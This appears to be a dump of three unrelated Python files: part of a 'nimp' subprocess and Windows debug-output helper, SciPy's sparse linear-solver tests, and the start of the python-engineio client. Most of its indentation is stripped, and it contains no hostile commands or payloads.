logging.info('Stopping stdout monitoring (OutputDebugString is active)')
all_pipes[0].close()
return
if not hide_output:
logger.info(line.strip('\n').strip('\r'))
# Sleep for 10 milliseconds if there was no data,
# or we’ll hog the CPU.
time.sleep(0.010)
# Default threads
all_workers = [ threading.Thread(target=_output_worker, args=(i,)) for i in range(3) ]
# Thread to feed stdin data if necessary
if stdin is not None:
all_workers.append(threading.Thread(target=_input_worker, args=(process.stdin, stdin.encode(encoding))))
# Send keepalive to stderr if requested
if heartbeat > 0:
all_workers.append(threading.Thread(target = _heartbeat_worker, args = (heartbeat, )))
for thread in all_workers:
thread.start()
try:
exit_code = process.wait()
finally:
process = None
# For some reason, must be done _before_ threads are joined, or
# we get stuck waiting for something!
if debug_pipe:
debug_pipe.stop()
debug_pipe = None
for thread in all_workers:
thread.join()
if not hide_output:
logging.info('Finished with exit code %d (0x%08x)', exit_code, exit_code)
if capture_output:
return exit_code, ''.join(all_captures[0]), ''.join(all_captures[1])
return exit_code
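# Usage sketch: call() above is the module's main entry point; it runs a
# command, mirrors its output through the 'child_processes' logger and can
# optionally capture it. A hedged example with an arbitrary command:
def _example_capture_output():
    exit_code, out, err = call(['python', '--version'], capture_output=True)
    return exit_code, out.strip(), err.strip()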
def _sanitize_command(command):
new_command = []
for it in command:
# If we’re running under MSYS, leading slashes in command line arguments
# will be treated as a path, so we need to escape them, except if the given
# argument is indeed a file.
if it[0:1] == '/':
if nimp.sys.platform.is_msys():
# If the argument starts with /, we may wish to rewrite it
if it[1:2].isalpha() and it[2:3] == '/':
# Stuff like /c/... looks like a path with a drive letter, keep it that way
# but /c is most probably a flag, so that one needs to be escaped
pass
elif len(it) > 5 and (os.path.isfile(it) or os.path.isdir(it)):
pass
else:
it = '/' + it
new_command.append(it)
return new_command
if nimp.sys.platform.is_windows():
_KERNEL32 = ctypes.windll.kernel32 if hasattr(ctypes, 'windll') else None # pylint: disable = invalid-name
_KERNEL32.MapViewOfFile.restype = ctypes.c_void_p
_KERNEL32.UnmapViewOfFile.argtypes = [ctypes.c_void_p]
# Should be c_void_p(-1).value but doesn’t work
INVALID_HANDLE_VALUE = -1 # pylint: disable = invalid-name
WAIT_OBJECT_0 = 0x00000000 # pylint: disable = invalid-name
WAIT_OBJECT_1 = 0x00000001 # pylint: disable = invalid-name
INFINITE = 0xFFFFFFFF # pylint: disable = invalid-name
PAGE_READWRITE = 0x4 # pylint: disable = invalid-name
FILE_MAP_READ = 0x0004 # pylint: disable = invalid-name
SEM_FAILCRITICALERRORS = 0x0001 # pylint: disable = invalid-name
SEM_NOGPFAULTERRORBOX = 0x0002 # pylint: disable = invalid-name
SEM_NOOPENFILEERRORBOX = 0x8000 # pylint: disable = invalid-name
PROCESS_QUERY_INFORMATION = 0x0400 # pylint: disable = invalid-name
PROCESS_SYNCHRONIZE = 0x00100000 # pylint: disable = invalid-name
def _disable_win32_dialogs():
''' Disable “Entry Point Not Found” and “Application Error” dialogs for
child processes '''
_KERNEL32.SetErrorMode(SEM_FAILCRITICALERRORS \
| SEM_NOGPFAULTERRORBOX \
| SEM_NOOPENFILEERRORBOX)
class _OutputDebugStringLogger(threading.Thread):
''' Get output debug string from a process and writes it to a pipe '''
def __init__(self):
super().__init__()
fd_in, fd_out = os.pipe()
self.output = os.fdopen(fd_in, 'rb')
self._pipe_in = os.fdopen(fd_out, 'wb')
self._buffer_ev = _KERNEL32.CreateEventW(None, 0, 0, 'DBWIN_BUFFER_READY')
self._data_ev = _KERNEL32.CreateEventW(None, 0, 0, 'DBWIN_DATA_READY')
self._stop_ev = _KERNEL32.CreateEventW(None, 0, 0, None)
self._bufsize = 4096
self._mapping = _KERNEL32.CreateFileMappingW(INVALID_HANDLE_VALUE,
None,
PAGE_READWRITE,
0,
self._bufsize,
'DBWIN_BUFFER')
self._buffer = _KERNEL32.MapViewOfFile(self._mapping,
FILE_MAP_READ,
0, 0,
self._bufsize)
self._pid = None
@staticmethod
def _pid_to_winpid(pid):
# In case we’re running in MSYS2 Python, the PID we got is actually an
# internal MSYS2 PID, and the PID we want to watch is actually the WINPID,
# which we retrieve in /proc
try:
return int(open("/proc/%d/winpid" % (pid,)).read(10))
#pylint: disable=broad-except
except Exception:
return pid
def attach(self, pid):
''' Sets the process pid from which to capture output debug string '''
self._pid = _OutputDebugStringLogger._pid_to_winpid(pid)
logging.debug("Attached to process %d (winpid %d)", pid, self._pid)
def run(self):
pid_length = 4
data_length = self._bufsize - pid_length
# Signal that the buffer is available
_KERNEL32.SetEvent(self._buffer_ev)
events = [self._data_ev, self._stop_ev]
while True:
result = _KERNEL32.WaitForMultipleObjects(len(events),
(ctypes.c_void_p * len(events))(*events),
0,
INFINITE)
if result == WAIT_OBJECT_0:
pid_data = ctypes.string_at(self._buffer, pid_length)
pid, = struct.unpack('I', pid_data)
data = ctypes.string_at(self._buffer + pid_length, data_length)
# Signal that the buffer is available
_KERNEL32.SetEvent(self._buffer_ev)
if pid != self._pid:
continue
self._pipe_in.write(data[:data.index(0)])
self._pipe_in.flush()
elif result == WAIT_OBJECT_1:
break
else:
time.sleep(0.100)
def stop(self):
''' Stops this OutputDebugStringLogger '''
_KERNEL32.SetEvent(self._stop_ev)
self.join()
_KERNEL32.UnmapViewOfFile(self._buffer)
_KERNEL32.CloseHandle(self._mapping)
self._pipe_in.close()
self.output.close()
if nimp.sys.platform.is_windows():
class Monitor(threading.Thread):
''' Watchdog killing child processes when nimp ends '''
def __init__(self):
super().__init__()
self._watcher_event_handle = _KERNEL32.CreateEventW(None, 0, 0, None)
if self._watcher_event_handle == 0:
logging.error("cannot create event")
self._nimp_handle = _KERNEL32.OpenProcess(PROCESS_SYNCHRONIZE | PROCESS_QUERY_INFORMATION, False, os.getppid())
if self._nimp_handle == 0:
logging.error("cannot open nimp process")
def run(self):
events = [self._nimp_handle, self._watcher_event_handle]
while True:
result = _KERNEL32.WaitForMultipleObjects(len(events), (ctypes.c_void_p * len(events))(*events), 0, INFINITE)
if result == WAIT_OBJECT_0:
logging.debug("Parent nimp.exe is not running anymore: current python process and its subprocesses are going to be killed")
call(['taskkill', '/F', '/T', '/PID', str(os.getpid())])
break
elif result == WAIT_OBJECT_1:
break
def stop(self):
''' Stops this monitor '''
_KERNEL32.CloseHandle(self._nimp_handle)
_KERNEL32.SetEvent(self._watcher_event_handle)
else:
class Monitor():
def start(self):
pass
def stop(self):
pass
|
test_linsolve.py
|
from __future__ import division, print_function, absolute_import
import sys
import threading
import numpy as np
from numpy import array, finfo, arange, eye, all, unique, ones, dot
import numpy.random as random
from numpy.testing import (
assert_array_almost_equal, assert_almost_equal,
assert_equal, assert_array_equal, assert_, assert_allclose,
assert_warns)
import pytest
from pytest import raises as assert_raises
import scipy.linalg
from scipy.linalg import norm, inv
from scipy.sparse import (spdiags, SparseEfficiencyWarning, csc_matrix,
csr_matrix, identity, isspmatrix, dok_matrix, lil_matrix, bsr_matrix)
from scipy.sparse.linalg import SuperLU
from scipy.sparse.linalg.dsolve import (spsolve, use_solver, splu, spilu,
MatrixRankWarning, _superlu, spsolve_triangular, factorized)
from scipy._lib._numpy_compat import suppress_warnings
sup_sparse_efficiency = suppress_warnings()
sup_sparse_efficiency.filter(SparseEfficiencyWarning)
# scikits.umfpack is not a SciPy dependency but it is optionally used in
# dsolve, so check whether it's available
try:
import scikits.umfpack as umfpack
has_umfpack = True
except ImportError:
has_umfpack = False
def toarray(a):
if isspmatrix(a):
return a.toarray()
else:
return a
class TestFactorized(object):
def setup_method(self):
n = 5
d = arange(n) + 1
self.n = n
self.A = spdiags((d, 2*d, d[::-1]), (-3, 0, 5), n, n).tocsc()
random.seed(1234)
def _check_singular(self):
A = csc_matrix((5,5), dtype='d')
b = ones(5)
assert_array_almost_equal(0. * b, factorized(A)(b))
def _check_non_singular(self):
# Make a diagonal dominant, to make sure it is not singular
n = 5
a = csc_matrix(random.rand(n, n))
b = ones(n)
expected = splu(a).solve(b)
assert_array_almost_equal(factorized(a)(b), expected)
def test_singular_without_umfpack(self):
use_solver(useUmfpack=False)
with assert_raises(RuntimeError, match="Factor is exactly singular"):
self._check_singular()
@pytest.mark.skipif(not has_umfpack, reason="umfpack not available")
def test_singular_with_umfpack(self):
use_solver(useUmfpack=True)
with suppress_warnings() as sup:
sup.filter(RuntimeWarning, "divide by zero encountered in double_scalars")
assert_warns(umfpack.UmfpackWarning, self._check_singular)
def test_non_singular_without_umfpack(self):
use_solver(useUmfpack=False)
self._check_non_singular()
@pytest.mark.skipif(not has_umfpack, reason="umfpack not available")
def test_non_singular_with_umfpack(self):
use_solver(useUmfpack=True)
self._check_non_singular()
def test_cannot_factorize_nonsquare_matrix_without_umfpack(self):
use_solver(useUmfpack=False)
msg = "can only factor square matrices"
with assert_raises(ValueError, match=msg):
factorized(self.A[:, :4])
@pytest.mark.skipif(not has_umfpack, reason="umfpack not available")
def test_factorizes_nonsquare_matrix_with_umfpack(self):
use_solver(useUmfpack=True)
# does not raise
factorized(self.A[:,:4])
def test_call_with_incorrectly_sized_matrix_without_umfpack(self):
use_solver(useUmfpack=False)
solve = factorized(self.A)
b = random.rand(4)
B = random.rand(4, 3)
BB = random.rand(self.n, 3, 9)
with assert_raises(ValueError, match="is of incompatible size"):
solve(b)
with assert_raises(ValueError, match="is of incompatible size"):
solve(B)
with assert_raises(ValueError,
match="object too deep for desired array"):
solve(BB)
@pytest.mark.skipif(not has_umfpack, reason="umfpack not available")
def test_call_with_incorrectly_sized_matrix_with_umfpack(self):
use_solver(useUmfpack=True)
solve = factorized(self.A)
b = random.rand(4)
B = random.rand(4, 3)
BB = random.rand(self.n, 3, 9)
# does not raise
solve(b)
msg = "object too deep for desired array"
with assert_raises(ValueError, match=msg):
solve(B)
with assert_raises(ValueError, match=msg):
solve(BB)
def test_call_with_cast_to_complex_without_umfpack(self):
use_solver(useUmfpack=False)
solve = factorized(self.A)
b = random.rand(4)
for t in [np.complex64, np.complex128]:
with assert_raises(TypeError, match="Cannot cast array data"):
solve(b.astype(t))
@pytest.mark.skipif(not has_umfpack, reason="umfpack not available")
def test_call_with_cast_to_complex_with_umfpack(self):
use_solver(useUmfpack=True)
solve = factorized(self.A)
b = random.rand(4)
for t in [np.complex64, np.complex128]:
assert_warns(np.ComplexWarning, solve, b.astype(t))
@pytest.mark.skipif(not has_umfpack, reason="umfpack not available")
def test_assume_sorted_indices_flag(self):
# a sparse matrix with unsorted indices
unsorted_inds = np.array([2, 0, 1, 0])
data = np.array([10, 16, 5, 0.4])
indptr = np.array([0, 1, 2, 4])
A = csc_matrix((data, unsorted_inds, indptr), (3, 3))
b = ones(3)
# should raise when incorrectly assuming indices are sorted
use_solver(useUmfpack=True, assumeSortedIndices=True)
with assert_raises(RuntimeError,
match="UMFPACK_ERROR_invalid_matrix"):
factorized(A)
# should sort indices and succeed when not assuming indices are sorted
use_solver(useUmfpack=True, assumeSortedIndices=False)
expected = splu(A.copy()).solve(b)
assert_equal(A.has_sorted_indices, 0)
assert_array_almost_equal(factorized(A)(b), expected)
assert_equal(A.has_sorted_indices, 1)
class TestLinsolve(object):
def setup_method(self):
use_solver(useUmfpack=False)
def test_singular(self):
A = csc_matrix((5,5), dtype='d')
b = array([1, 2, 3, 4, 5],dtype='d')
with suppress_warnings() as sup:
sup.filter(MatrixRankWarning, "Matrix is exactly singular")
x = spsolve(A, b)
assert_(not np.isfinite(x).any())
def test_singular_gh_3312(self):
# "Bad" test case that leads SuperLU to call LAPACK with invalid
# arguments. Check that it fails moderately gracefully.
ij = np.array([(17, 0), (17, 6), (17, 12), (10, 13)], dtype=np.int32)
v = np.array([0.284213, 0.94933781, 0.15767017, 0.38797296])
A = csc_matrix((v, ij.T), shape=(20, 20))
b = np.arange(20)
try:
            # should either raise a RuntimeError or return a value
            # appropriate for singular input
x = spsolve(A, b)
assert_(not np.isfinite(x).any())
except RuntimeError:
pass
def test_twodiags(self):
A = spdiags([[1, 2, 3, 4, 5], [6, 5, 8, 9, 10]], [0, 1], 5, 5)
b = array([1, 2, 3, 4, 5])
# condition number of A
cond_A = norm(A.todense(),2) * norm(inv(A.todense()),2)
for t in ['f','d','F','D']:
eps = finfo(t).eps # floating point epsilon
b = b.astype(t)
for format in ['csc','csr']:
Asp = A.astype(t).asformat(format)
x = spsolve(Asp,b)
assert_(norm(b - Asp*x) < 10 * cond_A * eps)
def test_bvector_smoketest(self):
Adense = array([[0., 1., 1.],
[1., 0., 1.],
[0., 0., 1.]])
As = csc_matrix(Adense)
random.seed(1234)
x = random.randn(3)
b = As*x
x2 = spsolve(As, b)
assert_array_almost_equal(x, x2)
def test_bmatrix_smoketest(self):
Adense = array([[0., 1., 1.],
[1., 0., 1.],
[0., 0., 1.]])
As = csc_matrix(Adense)
random.seed(1234)
x = random.randn(3, 4)
Bdense = As.dot(x)
Bs = csc_matrix(Bdense)
x2 = spsolve(As, Bs)
assert_array_almost_equal(x, x2.todense())
@sup_sparse_efficiency
def test_non_square(self):
# A is not square.
A = ones((3, 4))
b = ones((4, 1))
assert_raises(ValueError, spsolve, A, b)
# A2 and b2 have incompatible shapes.
A2 = csc_matrix(eye(3))
b2 = array([1.0, 2.0])
assert_raises(ValueError, spsolve, A2, b2)
@sup_sparse_efficiency
def test_example_comparison(self):
row = array([0,0,1,2,2,2])
col = array([0,2,2,0,1,2])
data = array([1,2,3,-4,5,6])
sM = csr_matrix((data,(row,col)), shape=(3,3), dtype=float)
M = sM.todense()
row = array([0,0,1,1,0,0])
col = array([0,2,1,1,0,0])
data = array([1,1,1,1,1,1])
sN = csr_matrix((data, (row,col)), shape=(3,3), dtype=float)
N = sN.todense()
sX = spsolve(sM, sN)
X = scipy.linalg.solve(M, N)
assert_array_almost_equal(X, sX.todense())
@sup_sparse_efficiency
@pytest.mark.skipif(not has_umfpack, reason="umfpack not available")
def test_shape_compatibility(self):
use_solver(useUmfpack=True)
A = csc_matrix([[1., 0], [0, 2]])
bs = [
[1, 6],
array([1, 6]),
[[1], [6]],
array([[1], [6]]),
csc_matrix([[1], [6]]),
csr_matrix([[1], [6]]),
dok_matrix([[1], [6]]),
bsr_matrix([[1], [6]]),
array([[1., 2., 3.], [6., 8., 10.]]),
csc_matrix([[1., 2., 3.], [6., 8., 10.]]),
csr_matrix([[1., 2., 3.], [6., 8., 10.]]),
dok_matrix([[1., 2., 3.], [6., 8., 10.]]),
bsr_matrix([[1., 2., 3.], [6., 8., 10.]]),
]
for b in bs:
x = np.linalg.solve(A.toarray(), toarray(b))
for spmattype in [csc_matrix, csr_matrix, dok_matrix, lil_matrix]:
x1 = spsolve(spmattype(A), b, use_umfpack=True)
x2 = spsolve(spmattype(A), b, use_umfpack=False)
# check solution
if x.ndim == 2 and x.shape[1] == 1:
                    # spsolve also interprets these single-column arrays as "vectors"
x = x.ravel()
assert_array_almost_equal(toarray(x1), x, err_msg=repr((b, spmattype, 1)))
assert_array_almost_equal(toarray(x2), x, err_msg=repr((b, spmattype, 2)))
# dense vs. sparse output ("vectors" are always dense)
if isspmatrix(b) and x.ndim > 1:
assert_(isspmatrix(x1), repr((b, spmattype, 1)))
assert_(isspmatrix(x2), repr((b, spmattype, 2)))
else:
assert_(isinstance(x1, np.ndarray), repr((b, spmattype, 1)))
assert_(isinstance(x2, np.ndarray), repr((b, spmattype, 2)))
# check output shape
if x.ndim == 1:
# "vector"
assert_equal(x1.shape, (A.shape[1],))
assert_equal(x2.shape, (A.shape[1],))
else:
# "matrix"
assert_equal(x1.shape, x.shape)
assert_equal(x2.shape, x.shape)
A = csc_matrix((3, 3))
b = csc_matrix((1, 3))
assert_raises(ValueError, spsolve, A, b)
@sup_sparse_efficiency
def test_ndarray_support(self):
A = array([[1., 2.], [2., 0.]])
x = array([[1., 1.], [0.5, -0.5]])
b = array([[2., 0.], [2., 2.]])
assert_array_almost_equal(x, spsolve(A, b))
def test_gssv_badinput(self):
N = 10
d = arange(N) + 1.0
A = spdiags((d, 2*d, d[::-1]), (-3, 0, 5), N, N)
for spmatrix in (csc_matrix, csr_matrix):
A = spmatrix(A)
b = np.arange(N)
def not_c_contig(x):
return x.repeat(2)[::2]
def not_1dim(x):
return x[:,None]
def bad_type(x):
return x.astype(bool)
def too_short(x):
return x[:-1]
badops = [not_c_contig, not_1dim, bad_type, too_short]
for badop in badops:
msg = "%r %r" % (spmatrix, badop)
# Not C-contiguous
assert_raises((ValueError, TypeError), _superlu.gssv,
N, A.nnz, badop(A.data), A.indices, A.indptr,
b, int(spmatrix == csc_matrix), err_msg=msg)
assert_raises((ValueError, TypeError), _superlu.gssv,
N, A.nnz, A.data, badop(A.indices), A.indptr,
b, int(spmatrix == csc_matrix), err_msg=msg)
assert_raises((ValueError, TypeError), _superlu.gssv,
N, A.nnz, A.data, A.indices, badop(A.indptr),
b, int(spmatrix == csc_matrix), err_msg=msg)
def test_sparsity_preservation(self):
ident = csc_matrix([
[1, 0, 0],
[0, 1, 0],
[0, 0, 1]])
b = csc_matrix([
[0, 1],
[1, 0],
[0, 0]])
x = spsolve(ident, b)
assert_equal(ident.nnz, 3)
assert_equal(b.nnz, 2)
assert_equal(x.nnz, 2)
assert_allclose(x.A, b.A, atol=1e-12, rtol=1e-12)
def test_dtype_cast(self):
A_real = scipy.sparse.csr_matrix([[1, 2, 0],
[0, 0, 3],
[4, 0, 5]])
A_complex = scipy.sparse.csr_matrix([[1, 2, 0],
[0, 0, 3],
[4, 0, 5 + 1j]])
b_real = np.array([1,1,1])
b_complex = np.array([1,1,1]) + 1j*np.array([1,1,1])
x = spsolve(A_real, b_real)
assert_(np.issubdtype(x.dtype, np.floating))
x = spsolve(A_real, b_complex)
assert_(np.issubdtype(x.dtype, np.complexfloating))
x = spsolve(A_complex, b_real)
assert_(np.issubdtype(x.dtype, np.complexfloating))
x = spsolve(A_complex, b_complex)
assert_(np.issubdtype(x.dtype, np.complexfloating))
class TestSplu(object):
def setup_method(self):
use_solver(useUmfpack=False)
n = 40
d = arange(n) + 1
self.n = n
self.A = spdiags((d, 2*d, d[::-1]), (-3, 0, 5), n, n)
random.seed(1234)
def _smoketest(self, spxlu, check, dtype):
if np.issubdtype(dtype, np.complexfloating):
A = self.A + 1j*self.A.T
else:
A = self.A
A = A.astype(dtype)
lu = spxlu(A)
rng = random.RandomState(1234)
# Input shapes
for k in [None, 1, 2, self.n, self.n+2]:
msg = "k=%r" % (k,)
if k is None:
b = rng.rand(self.n)
else:
b = rng.rand(self.n, k)
if np.issubdtype(dtype, np.complexfloating):
b = b + 1j*rng.rand(*b.shape)
b = b.astype(dtype)
x = lu.solve(b)
check(A, b, x, msg)
x = lu.solve(b, 'T')
check(A.T, b, x, msg)
x = lu.solve(b, 'H')
check(A.T.conj(), b, x, msg)
@sup_sparse_efficiency
def test_splu_smoketest(self):
self._internal_test_splu_smoketest()
def _internal_test_splu_smoketest(self):
# Check that splu works at all
def check(A, b, x, msg=""):
eps = np.finfo(A.dtype).eps
r = A * x
assert_(abs(r - b).max() < 1e3*eps, msg)
self._smoketest(splu, check, np.float32)
self._smoketest(splu, check, np.float64)
self._smoketest(splu, check, np.complex64)
self._smoketest(splu, check, np.complex128)
@sup_sparse_efficiency
def test_spilu_smoketest(self):
self._internal_test_spilu_smoketest()
def _internal_test_spilu_smoketest(self):
errors = []
def check(A, b, x, msg=""):
r = A * x
err = abs(r - b).max()
assert_(err < 1e-2, msg)
if b.dtype in (np.float64, np.complex128):
errors.append(err)
self._smoketest(spilu, check, np.float32)
self._smoketest(spilu, check, np.float64)
self._smoketest(spilu, check, np.complex64)
self._smoketest(spilu, check, np.complex128)
assert_(max(errors) > 1e-5)
@sup_sparse_efficiency
def test_spilu_drop_rule(self):
# Test passing in the drop_rule argument to spilu.
A = identity(2)
rules = [
b'basic,area'.decode('ascii'), # unicode
b'basic,area', # ascii
[b'basic', b'area'.decode('ascii')]
]
for rule in rules:
# Argument should be accepted
assert_(isinstance(spilu(A, drop_rule=rule), SuperLU))
def test_splu_nnz0(self):
A = csc_matrix((5,5), dtype='d')
assert_raises(RuntimeError, splu, A)
def test_spilu_nnz0(self):
A = csc_matrix((5,5), dtype='d')
assert_raises(RuntimeError, spilu, A)
def test_splu_basic(self):
# Test basic splu functionality.
n = 30
rng = random.RandomState(12)
a = rng.rand(n, n)
a[a < 0.95] = 0
# First test with a singular matrix
a[:, 0] = 0
a_ = csc_matrix(a)
# Matrix is exactly singular
assert_raises(RuntimeError, splu, a_)
        # Make the matrix diagonally dominant to make sure it is not singular
a += 4*eye(n)
a_ = csc_matrix(a)
lu = splu(a_)
b = ones(n)
x = lu.solve(b)
assert_almost_equal(dot(a, x), b)
def test_splu_perm(self):
# Test the permutation vectors exposed by splu.
n = 30
a = random.random((n, n))
a[a < 0.95] = 0
        # Make the matrix diagonally dominant to make sure it is not singular
a += 4*eye(n)
a_ = csc_matrix(a)
lu = splu(a_)
# Check that the permutation indices do belong to [0, n-1].
for perm in (lu.perm_r, lu.perm_c):
assert_(all(perm > -1))
assert_(all(perm < n))
assert_equal(len(unique(perm)), len(perm))
# Now make a symmetric, and test that the two permutation vectors are
# the same
# Note: a += a.T relies on undefined behavior.
a = a + a.T
a_ = csc_matrix(a)
lu = splu(a_)
assert_array_equal(lu.perm_r, lu.perm_c)
@pytest.mark.skipif(not hasattr(sys, 'getrefcount'), reason="no sys.getrefcount")
def test_lu_refcount(self):
# Test that we are keeping track of the reference count with splu.
n = 30
a = random.random((n, n))
a[a < 0.95] = 0
        # Make the matrix diagonally dominant to make sure it is not singular
a += 4*eye(n)
a_ = csc_matrix(a)
lu = splu(a_)
# And now test that we don't have a refcount bug
rc = sys.getrefcount(lu)
for attr in ('perm_r', 'perm_c'):
perm = getattr(lu, attr)
assert_equal(sys.getrefcount(lu), rc + 1)
del perm
assert_equal(sys.getrefcount(lu), rc)
def test_bad_inputs(self):
A = self.A.tocsc()
assert_raises(ValueError, splu, A[:,:4])
assert_raises(ValueError, spilu, A[:,:4])
for lu in [splu(A), spilu(A)]:
b = random.rand(42)
B = random.rand(42, 3)
BB = random.rand(self.n, 3, 9)
assert_raises(ValueError, lu.solve, b)
assert_raises(ValueError, lu.solve, B)
assert_raises(ValueError, lu.solve, BB)
assert_raises(TypeError, lu.solve,
b.astype(np.complex64))
assert_raises(TypeError, lu.solve,
b.astype(np.complex128))
@sup_sparse_efficiency
def test_superlu_dlamch_i386_nan(self):
# SuperLU 4.3 calls some functions returning floats without
        # declaring them. With the i386 Linux calling convention, this fails to
        # clear the floating point registers after the call. As a result, NaN
        # can appear in the next floating point operation performed.
#
# Here's a test case that triggered the issue.
n = 8
d = np.arange(n) + 1
A = spdiags((d, 2*d, d[::-1]), (-3, 0, 5), n, n)
A = A.astype(np.float32)
spilu(A)
A = A + 1j*A
B = A.A
assert_(not np.isnan(B).any())
@sup_sparse_efficiency
def test_lu_attr(self):
def check(dtype, complex_2=False):
A = self.A.astype(dtype)
if complex_2:
A = A + 1j*A.T
n = A.shape[0]
lu = splu(A)
            # Check that the decomposition is as advertised
Pc = np.zeros((n, n))
Pc[np.arange(n), lu.perm_c] = 1
Pr = np.zeros((n, n))
Pr[lu.perm_r, np.arange(n)] = 1
Ad = A.toarray()
lhs = Pr.dot(Ad).dot(Pc)
rhs = (lu.L * lu.U).toarray()
eps = np.finfo(dtype).eps
assert_allclose(lhs, rhs, atol=100*eps)
check(np.float32)
check(np.float64)
check(np.complex64)
check(np.complex128)
check(np.complex64, True)
check(np.complex128, True)
@pytest.mark.slow
@sup_sparse_efficiency
def test_threads_parallel(self):
oks = []
def worker():
try:
self.test_splu_basic()
self._internal_test_splu_smoketest()
self._internal_test_spilu_smoketest()
oks.append(True)
except Exception:
pass
threads = [threading.Thread(target=worker)
for k in range(20)]
for t in threads:
t.start()
for t in threads:
t.join()
assert_equal(len(oks), 20)
class TestSpsolveTriangular(object):
def setup_method(self):
use_solver(useUmfpack=False)
def test_singular(self):
n = 5
A = csr_matrix((n, n))
b = np.arange(n)
for lower in (True, False):
assert_raises(scipy.linalg.LinAlgError, spsolve_triangular, A, b, lower=lower)
@sup_sparse_efficiency
def test_bad_shape(self):
# A is not square.
A = np.zeros((3, 4))
b = ones((4, 1))
assert_raises(ValueError, spsolve_triangular, A, b)
# A2 and b2 have incompatible shapes.
A2 = csr_matrix(eye(3))
b2 = array([1.0, 2.0])
assert_raises(ValueError, spsolve_triangular, A2, b2)
@sup_sparse_efficiency
def test_input_types(self):
A = array([[1., 0.], [1., 2.]])
b = array([[2., 0.], [2., 2.]])
for matrix_type in (array, csc_matrix, csr_matrix):
x = spsolve_triangular(matrix_type(A), b, lower=True)
assert_array_almost_equal(A.dot(x), b)
@pytest.mark.slow
@sup_sparse_efficiency
def test_random(self):
def random_triangle_matrix(n, lower=True):
A = scipy.sparse.random(n, n, density=0.1, format='coo')
if lower:
A = scipy.sparse.tril(A)
else:
A = scipy.sparse.triu(A)
A = A.tocsr(copy=False)
for i in range(n):
A[i, i] = np.random.rand() + 1
return A
np.random.seed(1234)
for lower in (True, False):
for n in (10, 10**2, 10**3):
A = random_triangle_matrix(n, lower=lower)
for m in (1, 10):
for b in (np.random.rand(n, m),
np.random.randint(-9, 9, (n, m)),
np.random.randint(-9, 9, (n, m)) +
np.random.randint(-9, 9, (n, m)) * 1j):
x = spsolve_triangular(A, b, lower=lower)
assert_array_almost_equal(A.dot(x), b)
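# A minimal, hedged usage sketch (not part of the test suite above). It relies only
# on the public scipy.sparse / scipy.sparse.linalg APIs exercised by these tests and
# can be run directly with ``python`` on this file without affecting pytest collection.
if __name__ == "__main__":
    import numpy as _np
    from scipy.sparse import csc_matrix as _csc
    from scipy.sparse.linalg import splu as _splu, spsolve as _spsolve

    # A small diagonally dominant (hence non-singular) system.
    _A = _csc(_np.array([[4.0, 1.0, 0.0],
                         [1.0, 3.0, 0.0],
                         [0.0, 0.0, 2.0]]))
    _b = _np.array([1.0, 2.0, 3.0])
    # A one-shot solve and a reusable LU factorization give the same answer.
    print(_spsolve(_A, _b))
    print(_splu(_A).solve(_b))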
|
client.py
|
import logging
try:
import queue
except ImportError: # pragma: no cover
import Queue as queue
import signal
import threading
import time
import six
from six.moves import urllib
try:
import requests
except ImportError: # pragma: no cover
requests = None
try:
import websocket
except ImportError: # pragma: no cover
websocket = None
from . import exceptions
from . import packet
from . import payload
default_logger = logging.getLogger('engineio.client')
connected_clients = []
if six.PY2: # pragma: no cover
ConnectionError = OSError
def signal_handler(sig, frame):
"""SIGINT handler.
Disconnect all active clients and then invoke the original signal handler.
"""
for client in connected_clients[:]:
if client.is_asyncio_based():
client.start_background_task(client.disconnect, abort=True)
else:
client.disconnect(abort=True)
return original_signal_handler(sig, frame)
original_signal_handler = signal.signal(signal.SIGINT, signal_handler)
class Client(object):
"""An Engine.IO client.
This class implements a fully compliant Engine.IO web client with support
for websocket and long-polling transports.
:param logger: To enable logging set to ``True`` or pass a logger object to
use. To disable logging set to ``False``. The default is
``False``.
:param json: An alternative json module to use for encoding and decoding
packets. Custom json modules must have ``dumps`` and ``loads``
functions that are compatible with the standard library
versions.
"""
event_names = ['connect', 'disconnect', 'message']
def __init__(self, logger=False, json=None):
self.handlers = {}
self.base_url = None
self.transports = None
self.current_transport = None
self.sid = None
self.upgrades = None
self.ping_interval = None
self.ping_timeout = None
self.pong_received = True
self.http = None
self.ws = None
self.read_loop_task = None
self.write_loop_task = None
self.ping_loop_task = None
self.ping_loop_event = self.create_event()
self.queue = None
self.state = 'disconnected'
if json is not None:
packet.Packet.json = json
if not isinstance(logger, bool):
self.logger = logger
else:
self.logger = default_logger
if not logging.root.handlers and \
self.logger.level == logging.NOTSET:
if logger:
self.logger.setLevel(logging.INFO)
else:
self.logger.setLevel(logging.ERROR)
self.logger.addHandler(logging.StreamHandler())
def is_asyncio_based(self):
return False
def on(self, event, handler=None):
"""Register an event handler.
:param event: The event name. Can be ``'connect'``, ``'message'`` or
``'disconnect'``.
:param handler: The function that should be invoked to handle the
event. When this parameter is not given, the method
acts as a decorator for the handler function.
Example usage::
# as a decorator:
@eio.on('connect')
def connect_handler():
print('Connection request')
# as a method:
def message_handler(msg):
print('Received message: ', msg)
eio.send('response')
eio.on('message', message_handler)
"""
if event not in self.event_names:
raise ValueError('Invalid event')
def set_handler(handler):
self.handlers[event] = handler
return handler
if handler is None:
return set_handler
set_handler(handler)
def connect(self, url, headers={}, transports=None,
engineio_path='engine.io'):
"""Connect to an Engine.IO server.
:param url: The URL of the Engine.IO server. It can include custom
query string parameters if required by the server.
:param headers: A dictionary with custom headers to send with the
connection request.
:param transports: The list of allowed transports. Valid transports
are ``'polling'`` and ``'websocket'``. If not
given, the polling transport is connected first,
then an upgrade to websocket is attempted.
:param engineio_path: The endpoint where the Engine.IO server is
installed. The default value is appropriate for
most cases.
Example usage::
eio = engineio.Client()
eio.connect('http://localhost:5000')
"""
if self.state != 'disconnected':
raise ValueError('Client is not in a disconnected state')
valid_transports = ['polling', 'websocket']
if transports is not None:
if isinstance(transports, six.string_types):
transports = [transports]
transports = [transport for transport in transports
if transport in valid_transports]
if not transports:
raise ValueError('No valid transports provided')
self.transports = transports or valid_transports
self.queue = self.create_queue()
return getattr(self, '_connect_' + self.transports[0])(
url, headers, engineio_path)
def wait(self):
"""Wait until the connection with the server ends.
Client applications can use this function to block the main thread
during the life of the connection.
"""
if self.read_loop_task:
self.read_loop_task.join()
    def send(self, data, binary=None):
        """Send a message to the server.
        :param data: The data to send to the server. Data can be of type
``str``, ``bytes``, ``list`` or ``dict``. If a ``list``
or ``dict``, the data will be serialized as JSON.
:param binary: ``True`` to send packet as binary, ``False`` to send
as text. If not given, unicode (Python 2) and str
(Python 3) are sent as text, and str (Python 2) and
bytes (Python 3) are sent as binary.
"""
